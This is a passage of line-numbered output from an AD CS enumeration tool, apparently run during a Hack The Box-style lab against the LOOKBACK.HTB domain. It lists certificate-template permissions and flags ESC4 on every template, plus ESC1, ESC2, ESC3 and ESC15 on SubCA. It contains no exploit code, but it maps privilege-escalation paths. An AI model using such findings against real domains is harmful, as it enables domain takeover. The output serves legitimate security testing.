        Full Control Principals         : LOOKBACK.HTB\Domain Admins
137
                                          LOOKBACK.HTB\Enterprise Admins
138
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
139
                                          LOOKBACK.HTB\Enterprise Admins
140
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
141
                                          LOOKBACK.HTB\Enterprise Admins
142
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
143
                                          LOOKBACK.HTB\Domain Computers
144
                                          LOOKBACK.HTB\Enterprise Admins
145
    [+] User ACL Principals             : LOOKBACK.HTB\Administrator
146
    [!] Vulnerabilities
147
      ESC4                              : Template is owned by user.
148
  2
149
    Template Name                       : KerberosAuthentication
150
    Display Name                        : Kerberos Authentication
151
    Certificate Authorities             : lookback-DC01-CA
152
    Enabled                             : True
153
    Client Authentication               : True
154
    Enrollment Agent                    : False
155
    Any Purpose                         : False
156
    Enrollee Supplies Subject           : False
157
    Certificate Name Flag               : SubjectAltRequireDomainDns
158
                                          SubjectAltRequireDns
159
    Enrollment Flag                     : AutoEnrollment
160
    Extended Key Usage                  : Client Authentication
161
                                          Server Authentication
162
                                          Smart Card Logon
163
                                          KDC Authentication
164
    Requires Manager Approval           : False
165
    Requires Key Archival               : False
166
    Authorized Signatures Required      : 0
167
    Schema Version                      : 2
168
    Validity Period                     : 1 year
169
    Renewal Period                      : 6 weeks
170
    Minimum RSA Key Length              : 2048
171
    Template Created                    : 2025-10-19T13:52:34+00:00
172
    Template Last Modified              : 2025-10-19T13:52:34+00:00
173
    Permissions
174
      Enrollment Permissions
175
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
176
                                          LOOKBACK.HTB\Domain Admins
177
                                          LOOKBACK.HTB\Domain Controllers
178
                                          LOOKBACK.HTB\Enterprise Admins
179
                                          LOOKBACK.HTB\Enterprise Domain Controllers
180
      Object Control Permissions
181
        Owner                           : LOOKBACK.HTB\Enterprise Admins
182
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
183
                                          LOOKBACK.HTB\Enterprise Admins
184
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
185
                                          LOOKBACK.HTB\Enterprise Admins
186
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
187
                                          LOOKBACK.HTB\Enterprise Admins
188
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
189
                                          LOOKBACK.HTB\Domain Controllers
190
                                          LOOKBACK.HTB\Enterprise Admins
191
                                          LOOKBACK.HTB\Enterprise Domain Controllers
192
        Write Property AutoEnroll       : LOOKBACK.HTB\Domain Controllers
193
                                          LOOKBACK.HTB\Enterprise Domain Controllers
194
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
195
                                          LOOKBACK.HTB\Enterprise Admins
196
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
197
    [!] Vulnerabilities
198
      ESC4                              : Template is owned by user.
199
  3
200
    Template Name                       : OCSPResponseSigning
201
    Display Name                        : OCSP Response Signing
202
    Enabled                             : False
203
    Client Authentication               : False
204
    Enrollment Agent                    : False
205
    Any Purpose                         : False
206
    Enrollee Supplies Subject           : False
207
    Certificate Name Flag               : SubjectAltRequireDns
208
                                          SubjectRequireDnsAsCn
209
    Enrollment Flag                     : AddOcspNocheck
210
                                          Norevocationinfoinissuedcerts
211
    Extended Key Usage                  : OCSP Signing
212
    Requires Manager Approval           : False
213
    Requires Key Archival               : False
214
    RA Application Policies             : msPKI-Asymmetric-Algorithm`PZPWSTR`RSA`msPKI-Hash-Algorithm`PZPWSTR`SHA1`msPKI-Key-Security-Descriptor`PZPWSTR`D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;GR;;;S-1-5-80-3804348527-3718992918-2141599610-3686422417-2726379419)`msPKI-Key-Usage`DWORD`2`
215
    Authorized Signatures Required      : 0
216
    Schema Version                      : 3
217
    Validity Period                     : 2 weeks
218
    Renewal Period                      : 2 days
219
    Minimum RSA Key Length              : 2048
220
    Template Created                    : 2025-10-19T13:52:34+00:00
221
    Template Last Modified              : 2025-10-19T13:52:34+00:00
222
    Permissions
223
      Enrollment Permissions
224
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
225
                                          LOOKBACK.HTB\Enterprise Admins
226
      Object Control Permissions
227
        Owner                           : LOOKBACK.HTB\Enterprise Admins
228
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
229
                                          LOOKBACK.HTB\Enterprise Admins
230
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
231
                                          LOOKBACK.HTB\Enterprise Admins
232
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
233
                                          LOOKBACK.HTB\Enterprise Admins
234
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
235
                                          LOOKBACK.HTB\Enterprise Admins
236
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
237
    [!] Vulnerabilities
238
      ESC4                              : Template is owned by user.
239
  4
240
    Template Name                       : RASAndIASServer
241
    Display Name                        : RAS and IAS Server
242
    Enabled                             : False
243
    Client Authentication               : True
244
    Enrollment Agent                    : False
245
    Any Purpose                         : False
246
    Enrollee Supplies Subject           : False
247
    Certificate Name Flag               : SubjectAltRequireDns
248
                                          SubjectRequireCommonName
249
    Enrollment Flag                     : AutoEnrollment
250
    Extended Key Usage                  : Client Authentication
251
                                          Server Authentication
252
    Requires Manager Approval           : False
253
    Requires Key Archival               : False
254
    Authorized Signatures Required      : 0
255
    Schema Version                      : 2
256
    Validity Period                     : 1 year
257
    Renewal Period                      : 6 weeks
258
    Minimum RSA Key Length              : 2048
259
    Template Created                    : 2025-10-19T13:52:34+00:00
260
    Template Last Modified              : 2025-10-19T13:52:34+00:00
261
    Permissions
262
      Enrollment Permissions
263
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
264
                                          LOOKBACK.HTB\Enterprise Admins
265
                                          LOOKBACK.HTB\RAS and IAS Servers
266
      Object Control Permissions
267
        Owner                           : LOOKBACK.HTB\Enterprise Admins
268
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
269
                                          LOOKBACK.HTB\Enterprise Admins
270
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
271
                                          LOOKBACK.HTB\Enterprise Admins
272
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
273
                                          LOOKBACK.HTB\Enterprise Admins
274
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
275
                                          LOOKBACK.HTB\Enterprise Admins
276
                                          LOOKBACK.HTB\RAS and IAS Servers
277
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
278
    [!] Vulnerabilities
279
      ESC4                              : Template is owned by user.
280
  5
281
    Template Name                       : Workstation
282
    Display Name                        : Workstation Authentication
283
    Enabled                             : False
284
    Client Authentication               : True
285
    Enrollment Agent                    : False
286
    Any Purpose                         : False
287
    Enrollee Supplies Subject           : False
288
    Certificate Name Flag               : SubjectAltRequireDns
289
    Enrollment Flag                     : AutoEnrollment
290
    Extended Key Usage                  : Client Authentication
291
    Requires Manager Approval           : False
292
    Requires Key Archival               : False
293
    Authorized Signatures Required      : 0
294
    Schema Version                      : 2
295
    Validity Period                     : 1 year
296
    Renewal Period                      : 6 weeks
297
    Minimum RSA Key Length              : 2048
298
    Template Created                    : 2025-10-19T13:52:34+00:00
299
    Template Last Modified              : 2025-10-19T13:52:34+00:00
300
    Permissions
301
      Enrollment Permissions
302
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
303
                                          LOOKBACK.HTB\Domain Computers
304
                                          LOOKBACK.HTB\Enterprise Admins
305
      Object Control Permissions
306
        Owner                           : LOOKBACK.HTB\Enterprise Admins
307
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
308
                                          LOOKBACK.HTB\Enterprise Admins
309
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
310
                                          LOOKBACK.HTB\Enterprise Admins
311
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
312
                                          LOOKBACK.HTB\Enterprise Admins
313
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
314
                                          LOOKBACK.HTB\Domain Computers
315
                                          LOOKBACK.HTB\Enterprise Admins
316
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
317
    [!] Vulnerabilities
318
      ESC4                              : Template is owned by user.
319
  6
320
    Template Name                       : DirectoryEmailReplication
321
    Display Name                        : Directory Email Replication
322
    Certificate Authorities             : lookback-DC01-CA
323
    Enabled                             : True
324
    Client Authentication               : False
325
    Enrollment Agent                    : False
326
    Any Purpose                         : False
327
    Enrollee Supplies Subject           : False
328
    Certificate Name Flag               : SubjectAltRequireDirectoryGuid
329
                                          SubjectAltRequireDns
330
    Enrollment Flag                     : IncludeSymmetricAlgorithms
331
                                          PublishToDs
332
                                          AutoEnrollment
333
    Extended Key Usage                  : Directory Service Email Replication
334
    Requires Manager Approval           : False
335
    Requires Key Archival               : False
336
    Authorized Signatures Required      : 0
337
    Schema Version                      : 2
338
    Validity Period                     : 1 year
339
    Renewal Period                      : 6 weeks
340
    Minimum RSA Key Length              : 2048
341
    Template Created                    : 2025-10-19T13:52:34+00:00
342
    Template Last Modified              : 2025-10-19T13:52:34+00:00
343
    Permissions
344
      Enrollment Permissions
345
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
346
                                          LOOKBACK.HTB\Domain Admins
347
                                          LOOKBACK.HTB\Domain Controllers
348
                                          LOOKBACK.HTB\Enterprise Admins
349
                                          LOOKBACK.HTB\Enterprise Domain Controllers
350
      Object Control Permissions
351
        Owner                           : LOOKBACK.HTB\Enterprise Admins
352
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
353
                                          LOOKBACK.HTB\Enterprise Admins
354
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
355
                                          LOOKBACK.HTB\Enterprise Admins
356
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
357
                                          LOOKBACK.HTB\Enterprise Admins
358
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
359
                                          LOOKBACK.HTB\Domain Controllers
360
                                          LOOKBACK.HTB\Enterprise Admins
361
                                          LOOKBACK.HTB\Enterprise Domain Controllers
362
        Write Property AutoEnroll       : LOOKBACK.HTB\Domain Controllers
363
                                          LOOKBACK.HTB\Enterprise Domain Controllers
364
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
365
                                          LOOKBACK.HTB\Enterprise Admins
366
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
367
    [!] Vulnerabilities
368
      ESC4                              : Template is owned by user.
369
  7
370
    Template Name                       : DomainControllerAuthentication
371
    Display Name                        : Domain Controller Authentication
372
    Certificate Authorities             : lookback-DC01-CA
373
    Enabled                             : True
374
    Client Authentication               : True
375
    Enrollment Agent                    : False
376
    Any Purpose                         : False
377
    Enrollee Supplies Subject           : False
378
    Certificate Name Flag               : SubjectAltRequireDns
379
    Enrollment Flag                     : AutoEnrollment
380
    Extended Key Usage                  : Client Authentication
381
                                          Server Authentication
382
                                          Smart Card Logon
383
    Requires Manager Approval           : False
384
    Requires Key Archival               : False
385
    Authorized Signatures Required      : 0
386
    Schema Version                      : 2
387
    Validity Period                     : 1 year
388
    Renewal Period                      : 6 weeks
389
    Minimum RSA Key Length              : 2048
390
    Template Created                    : 2025-10-19T13:52:34+00:00
391
    Template Last Modified              : 2025-10-19T13:52:34+00:00
392
    Permissions
393
      Enrollment Permissions
394
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
395
                                          LOOKBACK.HTB\Domain Admins
396
                                          LOOKBACK.HTB\Domain Controllers
397
                                          LOOKBACK.HTB\Enterprise Admins
398
                                          LOOKBACK.HTB\Enterprise Domain Controllers
399
      Object Control Permissions
400
        Owner                           : LOOKBACK.HTB\Enterprise Admins
401
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
402
                                          LOOKBACK.HTB\Enterprise Admins
403
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
404
                                          LOOKBACK.HTB\Enterprise Admins
405
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
406
                                          LOOKBACK.HTB\Enterprise Admins
407
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
408
                                          LOOKBACK.HTB\Domain Controllers
409
                                          LOOKBACK.HTB\Enterprise Admins
410
                                          LOOKBACK.HTB\Enterprise Domain Controllers
411
        Write Property AutoEnroll       : LOOKBACK.HTB\Domain Controllers
412
                                          LOOKBACK.HTB\Enterprise Domain Controllers
413
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
414
                                          LOOKBACK.HTB\Enterprise Admins
415
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
416
    [!] Vulnerabilities
417
      ESC4                              : Template is owned by user.
418
  8
419
    Template Name                       : KeyRecoveryAgent
420
    Display Name                        : Key Recovery Agent
421
    Enabled                             : False
422
    Client Authentication               : False
423
    Enrollment Agent                    : False
424
    Any Purpose                         : False
425
    Enrollee Supplies Subject           : False
426
    Certificate Name Flag               : SubjectAltRequireUpn
427
                                          SubjectRequireDirectoryPath
428
    Enrollment Flag                     : IncludeSymmetricAlgorithms
429
                                          PendAllRequests
430
                                          PublishToKraContainer
431
                                          AutoEnrollment
432
    Private Key Flag                    : ExportableKey
433
    Extended Key Usage                  : Key Recovery Agent
434
    Requires Manager Approval           : True
435
    Requires Key Archival               : False
436
    Authorized Signatures Required      : 0
437
    Schema Version                      : 2
438
    Validity Period                     : 2 years
439
    Renewal Period                      : 6 weeks
440
    Minimum RSA Key Length              : 2048
441
    Template Created                    : 2025-10-19T13:52:34+00:00
442
    Template Last Modified              : 2025-10-19T13:52:34+00:00
443
    Permissions
444
      Enrollment Permissions
445
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
446
                                          LOOKBACK.HTB\Enterprise Admins
447
      Object Control Permissions
448
        Owner                           : LOOKBACK.HTB\Enterprise Admins
449
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
450
                                          LOOKBACK.HTB\Enterprise Admins
451
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
452
                                          LOOKBACK.HTB\Enterprise Admins
453
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
454
                                          LOOKBACK.HTB\Enterprise Admins
455
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
456
                                          LOOKBACK.HTB\Enterprise Admins
457
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
458
    [!] Vulnerabilities
459
      ESC4                              : Template is owned by user.
460
  9
461
    Template Name                       : CAExchange
462
    Display Name                        : CA Exchange
463
    Enabled                             : False
464
    Client Authentication               : False
465
    Enrollment Agent                    : False
466
    Any Purpose                         : False
467
    Enrollee Supplies Subject           : True
468
    Certificate Name Flag               : EnrolleeSuppliesSubject
469
    Enrollment Flag                     : IncludeSymmetricAlgorithms
470
    Extended Key Usage                  : Private Key Archival
471
    Requires Manager Approval           : False
472
    Requires Key Archival               : False
473
    Authorized Signatures Required      : 0
474
    Schema Version                      : 2
475
    Validity Period                     : 1 week
476
    Renewal Period                      : 1 day
477
    Minimum RSA Key Length              : 2048
478
    Template Created                    : 2025-10-19T13:52:34+00:00
479
    Template Last Modified              : 2025-10-19T13:52:34+00:00
480
    Permissions
481
      Enrollment Permissions
482
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
483
                                          LOOKBACK.HTB\Enterprise Admins
484
      Object Control Permissions
485
        Owner                           : LOOKBACK.HTB\Enterprise Admins
486
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
487
                                          LOOKBACK.HTB\Enterprise Admins
488
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
489
                                          LOOKBACK.HTB\Enterprise Admins
490
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
491
                                          LOOKBACK.HTB\Enterprise Admins
492
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
493
                                          LOOKBACK.HTB\Enterprise Admins
494
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
495
    [!] Vulnerabilities
496
      ESC4                              : Template is owned by user.
497
  10
498
    Template Name                       : CrossCA
499
    Display Name                        : Cross Certification Authority
500
    Enabled                             : False
501
    Client Authentication               : True
502
    Enrollment Agent                    : True
503
    Any Purpose                         : True
504
    Enrollee Supplies Subject           : True
505
    Certificate Name Flag               : EnrolleeSuppliesSubject
506
    Enrollment Flag                     : PublishToDs
507
    Private Key Flag                    : ExportableKey
508
    Requires Manager Approval           : False
509
    Requires Key Archival               : False
510
    RA Application Policies             : Qualified Subordination
511
    Authorized Signatures Required      : 1
512
    Schema Version                      : 2
513
    Validity Period                     : 5 years
514
    Renewal Period                      : 6 weeks
515
    Minimum RSA Key Length              : 2048
516
    Template Created                    : 2025-10-19T13:52:34+00:00
517
    Template Last Modified              : 2025-10-19T13:52:34+00:00
518
    Permissions
519
      Enrollment Permissions
520
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
521
                                          LOOKBACK.HTB\Enterprise Admins
522
      Object Control Permissions
523
        Owner                           : LOOKBACK.HTB\Enterprise Admins
524
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
525
                                          LOOKBACK.HTB\Enterprise Admins
526
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
527
                                          LOOKBACK.HTB\Enterprise Admins
528
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
529
                                          LOOKBACK.HTB\Enterprise Admins
530
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
531
                                          LOOKBACK.HTB\Enterprise Admins
532
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
533
    [!] Vulnerabilities
534
      ESC4                              : Template is owned by user.
535
  11
536
    Template Name                       : ExchangeUserSignature
537
    Display Name                        : Exchange Signature Only
538
    Enabled                             : False
539
    Client Authentication               : False
540
    Enrollment Agent                    : False
541
    Any Purpose                         : False
542
    Enrollee Supplies Subject           : True
543
    Certificate Name Flag               : EnrolleeSuppliesSubject
544
    Extended Key Usage                  : Secure Email
545
    Requires Manager Approval           : False
546
    Requires Key Archival               : False
547
    Authorized Signatures Required      : 0
548
    Schema Version                      : 1
549
    Validity Period                     : 1 year
550
    Renewal Period                      : 6 weeks
551
    Minimum RSA Key Length              : 2048
552
    Template Created                    : 2025-10-19T13:52:34+00:00
553
    Template Last Modified              : 2025-10-19T13:52:34+00:00
554
    Permissions
555
      Enrollment Permissions
556
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
557
                                          LOOKBACK.HTB\Enterprise Admins
558
      Object Control Permissions
559
        Owner                           : LOOKBACK.HTB\Enterprise Admins
560
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
561
                                          LOOKBACK.HTB\Enterprise Admins
562
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
563
                                          LOOKBACK.HTB\Enterprise Admins
564
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
565
                                          LOOKBACK.HTB\Enterprise Admins
566
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
567
                                          LOOKBACK.HTB\Enterprise Admins
568
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
569
    [!] Vulnerabilities
570
      ESC4                              : Template is owned by user.
571
  12
572
    Template Name                       : ExchangeUser
573
    Display Name                        : Exchange User
574
    Enabled                             : False
575
    Client Authentication               : False
576
    Enrollment Agent                    : False
577
    Any Purpose                         : False
578
    Enrollee Supplies Subject           : True
579
    Certificate Name Flag               : EnrolleeSuppliesSubject
580
    Enrollment Flag                     : IncludeSymmetricAlgorithms
581
    Private Key Flag                    : ExportableKey
582
    Extended Key Usage                  : Secure Email
583
    Requires Manager Approval           : False
584
    Requires Key Archival               : False
585
    Authorized Signatures Required      : 0
586
    Schema Version                      : 1
587
    Validity Period                     : 1 year
588
    Renewal Period                      : 6 weeks
589
    Minimum RSA Key Length              : 2048
590
    Template Created                    : 2025-10-19T13:52:34+00:00
591
    Template Last Modified              : 2025-10-19T13:52:34+00:00
592
    Permissions
593
      Enrollment Permissions
594
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
595
                                          LOOKBACK.HTB\Enterprise Admins
596
      Object Control Permissions
597
        Owner                           : LOOKBACK.HTB\Enterprise Admins
598
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
599
                                          LOOKBACK.HTB\Enterprise Admins
600
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
601
                                          LOOKBACK.HTB\Enterprise Admins
602
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
603
                                          LOOKBACK.HTB\Enterprise Admins
604
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
605
                                          LOOKBACK.HTB\Enterprise Admins
606
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
607
    [!] Vulnerabilities
608
      ESC4                              : Template is owned by user.
609
  13
610
    Template Name                       : CEPEncryption
611
    Display Name                        : CEP Encryption
612
    Enabled                             : False
613
    Client Authentication               : False
614
    Enrollment Agent                    : True
615
    Any Purpose                         : False
616
    Enrollee Supplies Subject           : True
617
    Certificate Name Flag               : EnrolleeSuppliesSubject
618
    Extended Key Usage                  : Certificate Request Agent
619
    Requires Manager Approval           : False
620
    Requires Key Archival               : False
621
    Authorized Signatures Required      : 0
622
    Schema Version                      : 1
623
    Validity Period                     : 2 years
624
    Renewal Period                      : 6 weeks
625
    Minimum RSA Key Length              : 2048
626
    Template Created                    : 2025-10-19T13:52:34+00:00
627
    Template Last Modified              : 2025-10-19T13:52:34+00:00
628
    Permissions
629
      Enrollment Permissions
630
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
631
                                          LOOKBACK.HTB\Enterprise Admins
632
      Object Control Permissions
633
        Owner                           : LOOKBACK.HTB\Enterprise Admins
634
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
635
                                          LOOKBACK.HTB\Enterprise Admins
636
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
637
                                          LOOKBACK.HTB\Enterprise Admins
638
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
639
                                          LOOKBACK.HTB\Enterprise Admins
640
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
641
                                          LOOKBACK.HTB\Enterprise Admins
642
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
643
    [!] Vulnerabilities
644
      ESC4                              : Template is owned by user.
645
  14
646
    Template Name                       : OfflineRouter
647
    Display Name                        : Router (Offline request)
648
    Enabled                             : False
649
    Client Authentication               : True
650
    Enrollment Agent                    : False
651
    Any Purpose                         : False
652
    Enrollee Supplies Subject           : True
653
    Certificate Name Flag               : EnrolleeSuppliesSubject
654
    Extended Key Usage                  : Client Authentication
655
    Requires Manager Approval           : False
656
    Requires Key Archival               : False
657
    Authorized Signatures Required      : 0
658
    Schema Version                      : 1
659
    Validity Period                     : 2 years
660
    Renewal Period                      : 6 weeks
661
    Minimum RSA Key Length              : 2048
662
    Template Created                    : 2025-10-19T13:52:34+00:00
663
    Template Last Modified              : 2025-10-19T13:52:34+00:00
664
    Permissions
665
      Enrollment Permissions
666
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
667
                                          LOOKBACK.HTB\Enterprise Admins
668
      Object Control Permissions
669
        Owner                           : LOOKBACK.HTB\Enterprise Admins
670
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
671
                                          LOOKBACK.HTB\Enterprise Admins
672
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
673
                                          LOOKBACK.HTB\Enterprise Admins
674
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
675
                                          LOOKBACK.HTB\Enterprise Admins
676
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
677
                                          LOOKBACK.HTB\Enterprise Admins
678
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
679
    [!] Vulnerabilities
680
      ESC4                              : Template is owned by user.
681
  15
682
    Template Name                       : IPSECIntermediateOffline
683
    Display Name                        : IPSec (Offline request)
684
    Enabled                             : False
685
    Client Authentication               : False
686
    Enrollment Agent                    : False
687
    Any Purpose                         : False
688
    Enrollee Supplies Subject           : True
689
    Certificate Name Flag               : EnrolleeSuppliesSubject
690
    Extended Key Usage                  : IP security IKE intermediate
691
    Requires Manager Approval           : False
692
    Requires Key Archival               : False
693
    Authorized Signatures Required      : 0
694
    Schema Version                      : 1
695
    Validity Period                     : 2 years
696
    Renewal Period                      : 6 weeks
697
    Minimum RSA Key Length              : 2048
698
    Template Created                    : 2025-10-19T13:52:34+00:00
699
    Template Last Modified              : 2025-10-19T13:52:34+00:00
700
    Permissions
701
      Enrollment Permissions
702
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
703
                                          LOOKBACK.HTB\Enterprise Admins
704
      Object Control Permissions
705
        Owner                           : LOOKBACK.HTB\Enterprise Admins
706
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
707
                                          LOOKBACK.HTB\Enterprise Admins
708
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
709
                                          LOOKBACK.HTB\Enterprise Admins
710
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
711
                                          LOOKBACK.HTB\Enterprise Admins
712
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
713
                                          LOOKBACK.HTB\Enterprise Admins
714
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
715
    [!] Vulnerabilities
716
      ESC4                              : Template is owned by user.
717
  16
718
    Template Name                       : IPSECIntermediateOnline
719
    Display Name                        : IPSec
720
    Enabled                             : False
721
    Client Authentication               : False
722
    Enrollment Agent                    : False
723
    Any Purpose                         : False
724
    Enrollee Supplies Subject           : False
725
    Certificate Name Flag               : SubjectAltRequireDns
726
                                          SubjectRequireDnsAsCn
727
    Enrollment Flag                     : AutoEnrollment
728
    Extended Key Usage                  : IP security IKE intermediate
729
    Requires Manager Approval           : False
730
    Requires Key Archival               : False
731
    Authorized Signatures Required      : 0
732
    Schema Version                      : 1
733
    Validity Period                     : 2 years
734
    Renewal Period                      : 6 weeks
735
    Minimum RSA Key Length              : 2048
736
    Template Created                    : 2025-10-19T13:52:34+00:00
737
    Template Last Modified              : 2025-10-19T13:52:34+00:00
738
    Permissions
739
      Enrollment Permissions
740
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
741
                                          LOOKBACK.HTB\Domain Computers
742
                                          LOOKBACK.HTB\Domain Controllers
743
                                          LOOKBACK.HTB\Enterprise Admins
744
      Object Control Permissions
745
        Owner                           : LOOKBACK.HTB\Enterprise Admins
746
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
747
                                          LOOKBACK.HTB\Enterprise Admins
748
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
749
                                          LOOKBACK.HTB\Enterprise Admins
750
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
751
                                          LOOKBACK.HTB\Enterprise Admins
752
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
753
                                          LOOKBACK.HTB\Domain Computers
754
                                          LOOKBACK.HTB\Domain Controllers
755
                                          LOOKBACK.HTB\Enterprise Admins
756
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
757
    [!] Vulnerabilities
758
      ESC4                              : Template is owned by user.
759
  17
760
    Template Name                       : SubCA
761
    Display Name                        : Subordinate Certification Authority
762
    Certificate Authorities             : lookback-DC01-CA
763
    Enabled                             : True
764
    Client Authentication               : True
765
    Enrollment Agent                    : True
766
    Any Purpose                         : True
767
    Enrollee Supplies Subject           : True
768
    Certificate Name Flag               : EnrolleeSuppliesSubject
769
    Private Key Flag                    : ExportableKey
770
    Requires Manager Approval           : False
771
    Requires Key Archival               : False
772
    Authorized Signatures Required      : 0
773
    Schema Version                      : 1
774
    Validity Period                     : 5 years
775
    Renewal Period                      : 6 weeks
776
    Minimum RSA Key Length              : 2048
777
    Template Created                    : 2025-10-19T13:52:34+00:00
778
    Template Last Modified              : 2025-10-19T13:52:34+00:00
779
    Permissions
780
      Enrollment Permissions
781
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
782
                                          LOOKBACK.HTB\Enterprise Admins
783
      Object Control Permissions
784
        Owner                           : LOOKBACK.HTB\Enterprise Admins
785
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
786
                                          LOOKBACK.HTB\Enterprise Admins
787
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
788
                                          LOOKBACK.HTB\Enterprise Admins
789
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
790
                                          LOOKBACK.HTB\Enterprise Admins
791
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
792
                                          LOOKBACK.HTB\Enterprise Admins
793
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
794
                                          LOOKBACK.HTB\Enterprise Admins
795
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
796
    [!] Vulnerabilities
797
      ESC1                              : Enrollee supplies subject and template allows client authentication.
798
      ESC2                              : Template can be used for any purpose.
799
      ESC3                              : Template has Certificate Request Agent EKU set.
800
      ESC15                             : Enrollee supplies subject and schema version is 1.
801
      ESC4                              : Template is owned by user.
802
    [*] Remarks
803
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
804
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
805
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
806
  18
807
    Template Name                       : CA
808
    Display Name                        : Root Certification Authority
809
    Enabled                             : False
810
    Client Authentication               : True
811
    Enrollment Agent                    : True
812
    Any Purpose                         : True
813
    Enrollee Supplies Subject           : True
814
